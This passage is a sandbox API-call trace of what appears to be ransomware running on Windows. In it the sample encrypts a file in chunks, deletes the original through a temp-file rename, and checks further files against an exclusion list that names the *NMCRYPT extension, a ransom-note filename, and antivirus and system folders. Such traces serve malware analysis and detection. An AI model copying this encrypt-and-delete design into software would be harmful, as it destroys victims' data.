hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.134] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.134] GetLastError () returned 0x0 [0164.134] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.134] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.134] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.135] GetLastError () returned 0x0 [0164.135] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.135] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.135] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.135] GetLastError () returned 0x0 [0164.135] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.135] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.135] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.135] GetLastError () returned 0x0 [0164.135] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.135] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.135] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.135] GetLastError () returned 0x0 [0164.135] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.135] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.135] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.135] GetLastError () returned 0x0 [0164.135] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.135] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.135] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.135] GetLastError () returned 0x0 [0164.135] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.135] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.135] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.136] GetLastError () returned 0x0 [0164.136] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.136] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.136] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.136] GetLastError () returned 0x0 [0164.136] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.136] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.136] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.136] GetLastError () returned 0x0 [0164.136] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.136] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.136] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.136] GetLastError () returned 0x0 [0164.136] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.136] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.136] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.136] GetLastError () returned 0x0 [0164.136] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.136] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.136] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.136] GetLastError () returned 0x0 [0164.136] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.136] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.136] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.136] GetLastError () returned 0x0 [0164.136] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.137] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.137] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.137] GetLastError () returned 0x0 [0164.137] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.137] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.137] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.137] GetLastError () returned 0x0 [0164.137] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.137] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.137] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.137] GetLastError () returned 0x0 [0164.137] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.137] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.137] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.137] GetLastError () returned 0x0 [0164.137] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.137] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.137] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.137] GetLastError () returned 0x0 [0164.137] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.137] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.137] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.137] GetLastError () returned 0x0 [0164.137] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.137] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.138] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.138] GetLastError () returned 0x0 [0164.138] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.138] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.138] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.138] GetLastError () returned 0x0 [0164.138] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.138] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.138] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.138] GetLastError () returned 0x0 [0164.138] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.138] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.138] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.138] GetLastError () returned 0x0 [0164.138] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.138] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.138] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.138] GetLastError () returned 0x0 [0164.138] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.138] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0xb4, lpOverlapped=0x0) returned 1 [0164.138] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xb4, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xc0) returned 1 [0164.138] GetLastError () returned 0x0 [0164.138] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xc0, lpOverlapped=0x0) returned 1 [0164.138] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.138] WriteFile (in: hFile=0x588, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf")) returned 0x20 [0164.139] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf", dwFileAttributes=0x20) returned 0 [0164.139] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf") returned 1 [0164.139] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf")) returned 0 [0164.139] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf" [0164.139] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.139] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF499.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf499.tmp")) returned 0xf499 [0164.140] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF499.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf499.tmp"), dwFlags=0x1) returned 0 [0164.140] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF499.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf499.tmp")) returned 1 [0164.140] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0164.140] wcslen (_String="OK") returned 0x2 [0164.140] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.140] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.140] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0164.141] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0164.141] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0164.141] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*NMCRYPT") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*Recovers your files.html") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*.exe") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*.dll") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*.lnk") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*.bat") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*.ini") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*.msi") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*.scf") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*pagefile.sys*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*AppData*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*\\winrar\\*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*\\java\\*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*\\windows\\*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*\\ESET\\*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*\\AVG\\*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*Atheros*") returned 0 [0164.141] PathMatchSpecW 